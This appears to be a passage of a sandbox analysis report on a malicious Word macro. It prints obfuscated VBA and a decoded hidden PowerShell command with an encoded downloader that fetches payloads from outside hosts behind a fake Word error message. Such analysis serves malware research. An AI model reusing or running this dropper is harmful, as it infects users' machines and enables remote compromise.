ACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcA,,) -> 0

                                                                                                                        Jib98w2i8chhr

                                                                                                                        N4enanrrzm_ja

                                                                                                                        executed
                                                                                                                        343

                                                                                                                        Goto GrdEGI

                                                                                                                        344

                                                                                                                        Dim OEleEeCT as String

                                                                                                                        345

                                                                                                                        Dim ZTXrGl as String

                                                                                                                        346

                                                                                                                        Open "QrkQH.tOWCIP.GrDHUJ" For Binary As 191

                                                                                                                        Open

                                                                                                                        349

                                                                                                                        Put # 191, , OEleEeCT

                                                                                                                        350

                                                                                                                        Close # 191

                                                                                                                        350

                                                                                                                        GrdEGI:

                                                                                                                        352

                                                                                                                        Goto tzmsZ

                                                                                                                        353

                                                                                                                        Dim UWnPEFF as String

                                                                                                                        354

                                                                                                                        Dim uRYMAlGHA as String

                                                                                                                        355

                                                                                                                        Open "LQAVC.FldzmI.oCeVXZC" For Binary As 181

                                                                                                                        Open

                                                                                                                        358

                                                                                                                        Put # 181, , UWnPEFF

                                                                                                                        359

                                                                                                                        Close # 181

                                                                                                                        359

                                                                                                                        tzmsZ:

                                                                                                                        361

                                                                                                                        Goto NQfbJHA

                                                                                                                        362

                                                                                                                        Dim pXLSUvXGL as String

                                                                                                                        363

                                                                                                                        Dim yXjmE as String

                                                                                                                        364

                                                                                                                        Open "xbtmGo.qIuZXGHJ.RZptvtQEG" For Binary As 127

                                                                                                                        Open

                                                                                                                        367

                                                                                                                        Put # 127, , pXLSUvXGL

                                                                                                                        368

                                                                                                                        Close # 127

                                                                                                                        368

                                                                                                                        NQfbJHA:

                                                                                                                        370

                                                                                                                        Goto ZXOpRLQFH

                                                                                                                        371

                                                                                                                        Dim HmbOBrAAC as String

                                                                                                                        372

                                                                                                                        Dim ZSAiDINAr as String

                                                                                                                        373

                                                                                                                        Open "cRxbPCb.XykXFJGA.LtZggMsGa" For Binary As 103

                                                                                                                        Open

                                                                                                                        376

                                                                                                                        Put # 103, , HmbOBrAAC

                                                                                                                        377

                                                                                                                        Close # 103

                                                                                                                        377

                                                                                                                        ZXOpRLQFH:

                                                                                                                        379

                                                                                                                        Goto mfYda

                                                                                                                        380

                                                                                                                        Dim iqyjE as String

                                                                                                                        381

                                                                                                                        Dim omutJ as String

                                                                                                                        382

                                                                                                                        Open "HoPXpGBA.IwHCJMDRA.CmlzH" For Binary As 82

                                                                                                                        Open

                                                                                                                        385

                                                                                                                        Put # 82, , iqyjE

                                                                                                                        386

                                                                                                                        Close # 82

                                                                                                                        386

                                                                                                                        mfYda:

                                                                                                                        388

                                                                                                                        Goto LZRViG

                                                                                                                        389

                                                                                                                        Dim CIXpj as String

                                                                                                                        390

                                                                                                                        Dim uweUHDE as String

                                                                                                                        391

                                                                                                                        Open "OECHJGADF.eWIOVB.CjlHH" For Binary As 170

                                                                                                                        Open

                                                                                                                        394

                                                                                                                        Put # 170, , CIXpj

                                                                                                                        395

                                                                                                                        Close # 170

                                                                                                                        395

                                                                                                                        LZRViG:

                                                                                                                        397

                                                                                                                        End Function

                                                                                                                        Function Y94cd7j9wr9jms, APIs: 20, Strings: 12, Number of lines: 90, Relevance: 48.09
                                                                                                                        APIsMeta Information

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Replace

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Owy08cjm2ufmu

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open

                                                                                                                        Part of subcall function Mrfzpndjp3s0k@T1f2hilsywf9dq: Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        StringsDecrypted Strings
                                                                                                                        "VqHUG.ZFPuZgUK.BaCFC"
                                                                                                                        "NhKoBJB.bXBco.DTUxEg"
                                                                                                                        "tMHiBAq.JuMHZKNBq.cgyJFF"
                                                                                                                        "NuPRDAFC.UhBsmID.EkqPGFJEG"
                                                                                                                        "qqPeDr.wSQVWc.pJeJCC"
                                                                                                                        "FgtNVBC.LAhZJM.HJpZQ"
                                                                                                                        "ufMYp.QtEuJ.OwOyxH"
                                                                                                                        "HDCkBsF.dMGCBEF.ufLRD"
                                                                                                                        "nOQNGhA.FYVFJ.bklIA"
                                                                                                                        "KmgdV.ZGtAJHtj.ONGSH"
                                                                                                                        "MmewC.AVQUDGmHG.vtFSCPB"
                                                                                                                        "xRrfF.YqkEzRF.kLUPqyCFD"
                                                                                                                        LineInstructionMeta Information
                                                                                                                        398

                                                                                                                        Function Y94cd7j9wr9jms(Sdit1klsk_3t9o5mv)

                                                                                                                        399

                                                                                                                        On Error Resume Next

                                                                                                                        executed
                                                                                                                        400

                                                                                                                        Goto pbMAHF

                                                                                                                        401

                                                                                                                        Dim ZPidFrt as String

                                                                                                                        402

                                                                                                                        Dim rOzmqEAQ as String

                                                                                                                        403

                                                                                                                        Open "VqHUG.ZFPuZgUK.BaCFC" For Binary As 107

                                                                                                                        Open

                                                                                                                        406

                                                                                                                        Put # 107, , ZPidFrt

                                                                                                                        407

                                                                                                                        Close # 107

                                                                                                                        407

                                                                                                                        pbMAHF:

                                                                                                                        409

                                                                                                                        Goto HZVSIIU

                                                                                                                        410

                                                                                                                        Dim diQYvIIAB as String

                                                                                                                        411

                                                                                                                        Dim fRocABAt as String

                                                                                                                        412

                                                                                                                        Open "NhKoBJB.bXBco.DTUxEg" For Binary As 221

                                                                                                                        Open

                                                                                                                        415

                                                                                                                        Put # 221, , diQYvIIAB

                                                                                                                        416

                                                                                                                        Close # 221

                                                                                                                        416

                                                                                                                        HZVSIIU:

                                                                                                                        418

                                                                                                                        Goto IOzIsOFA

                                                                                                                        419

                                                                                                                        Dim iMqHCHFJ as String

                                                                                                                        420

                                                                                                                        Dim mKReIEI as String

                                                                                                                        421

                                                                                                                        Open "tMHiBAq.JuMHZKNBq.cgyJFF" For Binary As 166

                                                                                                                        Open

                                                                                                                        424

                                                                                                                        Put # 166, , iMqHCHFJ

                                                                                                                        425

                                                                                                                        Close # 166

                                                                                                                        425

                                                                                                                        IOzIsOFA:

                                                                                                                        427

                                                                                                                        Ilf72gd2e5isgp_i = (Sdit1klsk_3t9o5mv)

                                                                                                                        428

                                                                                                                        Goto khzFG

                                                                                                                        429

                                                                                                                        Dim fVpImB as String

                                                                                                                        430

                                                                                                                        Dim CjlbH as String

                                                                                                                        431

                                                                                                                        Open "NuPRDAFC.UhBsmID.EkqPGFJEG" For Binary As 180

                                                                                                                        Open

                                                                                                                        434

                                                                                                                        Put # 180, , fVpImB

                                                                                                                        435

                                                                                                                        Close # 180

                                                                                                                        435

                                                                                                                        khzFG:

                                                                                                                        437

                                                                                                                        Goto KMpoSNLJ

                                                                                                                        438

                                                                                                                        Dim LxvXa as String

                                                                                                                        439

                                                                                                                        Dim ZMCcDFc as String

                                                                                                                        440

                                                                                                                        Open "qqPeDr.wSQVWc.pJeJCC" For Binary As 198

                                                                                                                        Open

                                                                                                                        443

                                                                                                                        Put # 198, , LxvXa

                                                                                                                        444

                                                                                                                        Close # 198

                                                                                                                        444

                                                                                                                        KMpoSNLJ:

                                                                                                                        446

                                                                                                                        Goto kwwmA

                                                                                                                        447

                                                                                                                        Dim qgkvFbl as String

                                                                                                                        448

                                                                                                                        Dim JjteHBBVA as String

                                                                                                                        449

                                                                                                                        Open "FgtNVBC.LAhZJM.HJpZQ" For Binary As 126

                                                                                                                        Open

                                                                                                                        452

                                                                                                                        Put # 126, , qgkvFbl

                                                                                                                        453

                                                                                                                        Close # 126

                                                                                                                        453

                                                                                                                        kwwmA:

                                                                                                                        455

                                                                                                                        J6sy08nwwbjsyvunu = Mrfzpndjp3s0k(Ilf72gd2e5isgp_i)

                                                                                                                        456

                                                                                                                        Goto yKflP

                                                                                                                        457

                                                                                                                        Dim TbyMA as String

                                                                                                                        458

                                                                                                                        Dim uuXLMGBEg as String

                                                                                                                        459

                                                                                                                        Open "ufMYp.QtEuJ.OwOyxH" For Binary As 132

                                                                                                                        Open

                                                                                                                        462

                                                                                                                        Put # 132, , TbyMA

                                                                                                                        463

                                                                                                                        Close # 132

                                                                                                                        463

                                                                                                                        yKflP:

                                                                                                                        465

                                                                                                                        Goto UcOAeq

                                                                                                                        466

                                                                                                                        Dim jzcemJ as String

                                                                                                                        467

                                                                                                                        Dim bTmHFI as String

                                                                                                                        468

                                                                                                                        Open "HDCkBsF.dMGCBEF.ufLRD" For Binary As 157

                                                                                                                        Open

                                                                                                                        471

                                                                                                                        Put # 157, , jzcemJ

                                                                                                                        472

                                                                                                                        Close # 157

                                                                                                                        472

                                                                                                                        UcOAeq:

                                                                                                                        474

                                                                                                                        Goto kydQU

                                                                                                                        475

                                                                                                                        Dim MQmKFAAtE as String

                                                                                                                        476

                                                                                                                        Dim ZldpVI as String

                                                                                                                        477

                                                                                                                        Open "nOQNGhA.FYVFJ.bklIA" For Binary As 150

                                                                                                                        Open

                                                                                                                        480

                                                                                                                        Put # 150, , MQmKFAAtE

                                                                                                                        481

                                                                                                                        Close # 150

                                                                                                                        481

                                                                                                                        kydQU:

                                                                                                                        483

                                                                                                                        Y94cd7j9wr9jms = J6sy08nwwbjsyvunu

                                                                                                                        484

                                                                                                                        Goto URTAHB

                                                                                                                        485

                                                                                                                        Dim oqOQrACK as String

                                                                                                                        486

                                                                                                                        Dim fZLyN as String

                                                                                                                        487

                                                                                                                        Open "KmgdV.ZGtAJHtj.ONGSH" For Binary As 237

                                                                                                                        Open

                                                                                                                        490

                                                                                                                        Put # 237, , oqOQrACK

                                                                                                                        491

                                                                                                                        Close # 237

                                                                                                                        491

                                                                                                                        URTAHB:

                                                                                                                        493

                                                                                                                        Goto aopzzCP

                                                                                                                        494

                                                                                                                        Dim RjcPJ as String

                                                                                                                        495

                                                                                                                        Dim RdYqcFDJ as String

                                                                                                                        496

                                                                                                                        Open "MmewC.AVQUDGmHG.vtFSCPB" For Binary As 136

                                                                                                                        Open

                                                                                                                        499

                                                                                                                        Put # 136, , RjcPJ

                                                                                                                        500

                                                                                                                        Close # 136

                                                                                                                        500

                                                                                                                        aopzzCP:

                                                                                                                        502

                                                                                                                        Goto eLkJvFE

                                                                                                                        503

                                                                                                                        Dim LwWkX as String

                                                                                                                        504

                                                                                                                        Dim WrCtJYU as String

                                                                                                                        505

                                                                                                                        Open "xRrfF.YqkEzRF.kLUPqyCFD" For Binary As 48

                                                                                                                        Open

                                                                                                                        508

                                                                                                                        Put # 48, , LwWkX

                                                                                                                        509

                                                                                                                        Close # 48

                                                                                                                        509

                                                                                                                        eLkJvFE:

                                                                                                                        511

                                                                                                                        End Function

                                                                                                                        Function Mrfzpndjp3s0k, APIs: 8, Strings: 7, Number of lines: 45, Relevance: 31.545
                                                                                                                        APIsMeta Information

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Replace

                                                                                                                        		Replace("wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)(Sqq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)(qq)(s2)(pqq)(s2)(qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)(","qq)(s2)(",) -> winmgmtS:win32_process Replace("qq)(s2)(qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(/qq)(s2)(cqq)(s2)( qq)(s2)(mqq)(s2)(sqq)(s2)(gqq)(s2)( qq)(s2)(%qq)(s2)(uqq)(s2)(sqq)(s2)(eqq)(s2)(rqq)(s2)(nqq)(s2)(aqq)(s2)(mqq)(s2)(eqq)(s2)(%qq)(s2)( qq)(s2)(/qq)(s2)(vqq)(s2)( qq)(s2)(Wqq)(s2)(oqq)(s2)(rqq)(s2)(dqq)(s2)( qq)(s2)(eqq)(s2)(xqq)(s2)(pqq)(s2)(eqq)(s2)(rqq)(s2)(iqq)(s2)(eqq)(s2)(nqq)(s2)(cqq)(s2)(eqq)(s2)(dqq)(s2)( qq)(s2)(aqq)(s2)(nqq)(s2)( qq)(s2)(eqq)(s2)(rqq)(s2)(rqq)(s2)(oqq)(s2)(rqq)(s2)( qq)(s2)(tqq)(s2)(rqq)(s2)(yqq)(s2)(iqq)(s2)(nqq)(s2)(gqq)(s2)( qq)(s2)(tqq)(s2)(oqq)(s2)( qq)(s2)(oqq)(s2)(pqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(tqq)(s2)(hqq)(s2)(eqq)(s2)( qq)(s2)(fqq)(s2)(iqq)(s2)(lqq)(s2)(eqq)(s2)(.qq)(s2)( qq)(s2)(&qq)(s2)( qq)(s2)( qq)(s2)(Pqq)(s2)(Oqq)(s2)(wqq)(s2)(eqq)(s2)(rqq)(s2)(sqq)(s2)(hqq)(s2)(eqq)(s2)(Lqq)(s2)(Lqq)(s2)( qq)(s2)(-qq)(s2)(wqq)(s2)( qq)(s2)(hqq)(s2)(iqq)(s2)(dqq)(s2)(dqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(-qq)(s2)(Eqq)(s2)(Nqq)(s2)(Cqq)(s2)(Oqq)(s2)(Dqq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( IAAqq)(s2)(gACqq)(s2)(QAYqq)(s2)(wBWqq)(s2)(AE4qq)(s2)(AZwqq)(s2)(BBAqq)(s2)(FMAqq)(s2)(PQAqq)(s2)(gAFqq)(s2)(sAVqq)(s2)(AB5qq)(s2)(AFAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(EAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DMAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(IAfqq)(s2)(QAiqq)(s2)(AC0qq)(s2)(ARgqq)(s2)(AgAqq)(s2)(CcAqq)(s2)(WQBqq)(s2)(TAFqq)(s2)(QAZqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ASQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(TACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AFIqq)(s2)(AeQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(PACqq)(s2)(4ARqq)(s2)(ABpqq)(s2)(AHIqq)(s2)(ARQqq)(s2)(BDAqq)(s2)(FQAqq)(s2)(bwAqq)(s2)(nACqq)(s2)(kAOqq)(s2)(wAgqq)(s2)(ACAqq)(s2)(AIAqq)(s2)(BzAqq)(s2)(GUAqq)(s2)(dAAqq)(s2)(tAEqq)(s2)(kAVqq)(s2)(ABFqq)(s2)(AE0qq)(s2)(AIAqq)(s2)(AoAqq)(s2)(CIAqq)(s2)(dgBqq)(s2)(hAHqq)(s2)(IAaqq)(s2)(QBhqq)(s2)(AEIqq)(s2)(AbAqq)(s2)(BlAqq)(s2)(CIAqq)(s2)(KwAqq)(s2)(iADqq)(s2)(oAbqq)(s2)(AA2qq)(s2)(AFUqq)(s2)(AIgqq)(s2)(ArAqq)(s2)(CIAqq)(s2)(WQBqq)(s2)(IACqq)(s2)(IAKqq)(s2)(wAiqq)(s2)(AE4qq)(s2)(AIgqq)(s2)(ApAqq)(s2)(CAAqq)(s2)(IAAqq)(s2)(oAFqq)(s2)(sAVqq)(s2)(ABZqq)(s2)(AHAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(UAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DcAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(QAfqq)(s2)(QB7qq)(s2)(ADgqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DIAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(MAfqq)(s2)(QB7qq)(s2)(ADYqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DEAqq)(s2)(fQAqq)(s2)(iACqq)(s2)(0ARqq)(s2)(gAgqq)(s2)(ACcqq)(s2)(AWQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(HAGqq)(s2)(UAcqq)(s2)(gAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BFAqq)(s2)(FAAqq)(s2)(bwBqq)(s2)(JACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AE4qq)(s2)(AdAqq)(s2)(BtAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(QARqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ATgqq)(s2)(BlAqq)(s2)(HQAqq)(s2)(LgBqq)(s2)(zAGqq)(s2)(UAJqq)(s2)(wAsqq)(s2)(ACcqq)(s2)(Acwqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(BAGqq)(s2)(4AQqq)(s2)(QAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BzAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(IAdqq)(s2)(gBJqq)(s2)(AGMqq)(s2)(AJwqq)(s2)(ApAqq)(s2)(CkAqq)(s2)(OwAqq)(s2)(gACqq)(s2)(QAWqq)(s2)(ABkqq)(s2)(AHoqq)(s2)(AXwqq)(s2)(B0Aqq)(s2)(F8Aqq)(s2)(aQAqq)(s2)(9ACqq)(s2)(gAJqq)(s2)(wBBqq)(s2)(AHUqq)(s2)(AJwqq)(s2)(ArAqq)(s2)(CgAqq)(s2)(JwBqq)(s2)(6ADqq)(s2)(AAeqq)(s2)(gAnqq)(s2)(ACsqq)(s2)(AJwqq)(s2)(BxAqq)(s2)(HgAqq)(s2)(JwAqq)(s2)(pACqq)(s2)(kAOqq)(s2)(wAkqq)(s2)(AFAqq)(s2)(AaQqq)(s2)(BpAqq)(s2)(DgAqq)(s2)(bwBqq)(s2)(lAGqq)(s2)(4APqq)(s2)(QAkqq)(s2)(AEIqq)(s2)(AMAqq)(s2)(B4Aqq)(s2)(GsAqq)(s2)(MAAqq)(s2)(0AHqq)(s2)(IAIqq)(s2)(AArqq)(s2)(ACAqq)(s2)(AWwqq)(s2)(BjAqq)(s2)(GgAqq)(s2)(YQBqq)(s2)(yAFqq)(s2)(0AKqq)(s2)(AA2qq)(s2)(ADQqq)(s2)(AKQqq)(s2)(AgAqq)(s2)(CsAqq)(s2)(IAAqq)(s2)(kAFqq)(s2)(YAYqq)(s2)(QBsqq)(s2)(ADYqq)(s2)(AcQqq)(s2)(BhAqq)(s2)(HgAqq)(s2)(OwAqq)(s2)(kAEqq)(s2)(wAcqq)(s2)(gBfqq)(s2)(AGwqq)(s2)(AcQqq)(s2)(BuAqq)(s2)(HcAqq)(s2)(PQAqq)(s2)(oACqq)(s2)(gAJqq)(s2)(wBQqq)(s2)(AGsqq)(s2)(A,"qq)(s2)(",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzADIAKQAoAGMAaQBBACcAKwAnAGoAJwArACcAYwBnACcAKQApACsAKAAoACcAagBxAHEAKQAoAHMAMgApACgAQABoAHQAdABwACcAKwAnADoAcQAnACsAJwBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAMgApACgAcQBxACcAKwAnACkAJwArACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwB0ACcAKwAnAG8AbgBnACcAKwAnAGQAYQBpAGgAYQAnACsAJwBuAG8AaQAuAGMAJwArACcAbwBtAHEAcQApACgAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoADgANAA3ADMANAA2ADMAMgA0ACcAKwAnADIAJwArACcAMwAnACsAJwA0ADIAMwA0AHEAJwApACkAKwAoACgAJwBxACkAKABzADIAJwArACcAKQAnACsAJwAoACcAKwAnAHIAcABuAHYAWABtACcAKQApACsAJwBxACcAKwAnAHEAJwArACgAKAAnACkAJwArACcAKABzADIAJwArACcAKQAoAEAAaAB0AHQAcAAnACsAJwA6AHEAcQApACcAKwAnACgAcwAyACkAJwArACcAKABxAHEAJwApACkAKwAoACgAJwApACcAKwAnACgAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGMAJwApACkAKwAoACcAaABlACcAKwAnAHIAawAnACkAKwAnAGEAJwArACcAcwAnACsAKAAnAGgAYwAnACsAJwBoAGEAbgAnACkAKwAoACcAdQAnACsAJwAuAGMAJwApACsAKAAoACcAbwBtACcAKwAnAHEAcQApACgAcwAnACsAJwAyACkAKAAnACsAJwBaADoAcQBxACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAMgApACcAKwAnACgANABaAEUAOABxACcAKwAnAHEAJwArACcAK

                                                                                                                        Owy08cjm2ufmu

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        Open

                                                                                                                        StringsDecrypted Strings
                                                                                                                        "VVcDBJklB.wcffJ.HXsnGGAHN"
                                                                                                                        "emmJF.oEJjOD.giiLoEJv"
                                                                                                                        "aCKLVJaH.XtEZlTZ.CLelFNHGI"
                                                                                                                        "qq"")(s2)("
                                                                                                                        "FhCyJa.yKJBb.ijMMEFEqB"
                                                                                                                        "eLPyC.ZdqCDyGC.QcmSHJFJl"
                                                                                                                        "sVsyIHHN.BqamC.SasWG"
                                                                                                                        LineInstructionMeta Information
                                                                                                                        2

                                                                                                                        Function Mrfzpndjp3s0k(Bnivj2ii9s31hmeej0)

                                                                                                                        3

                                                                                                                        Goto XwhzUcG

                                                                                                                        executed
                                                                                                                        4

                                                                                                                        Dim pAYVi as String

                                                                                                                        5

                                                                                                                        Dim BtpGqEA as String

                                                                                                                        6

                                                                                                                        Open "VVcDBJklB.wcffJ.HXsnGGAHN" For Binary As 247

                                                                                                                        Open

                                                                                                                        9

                                                                                                                        Put # 247, , pAYVi

                                                                                                                        10

                                                                                                                        Close # 247

                                                                                                                        10

                                                                                                                        XwhzUcG:

                                                                                                                        12

                                                                                                                        Goto lyHkDXIOH

                                                                                                                        13

                                                                                                                        Dim flWCjiEl as String

                                                                                                                        14

                                                                                                                        Dim AoWWOyA as String

                                                                                                                        15

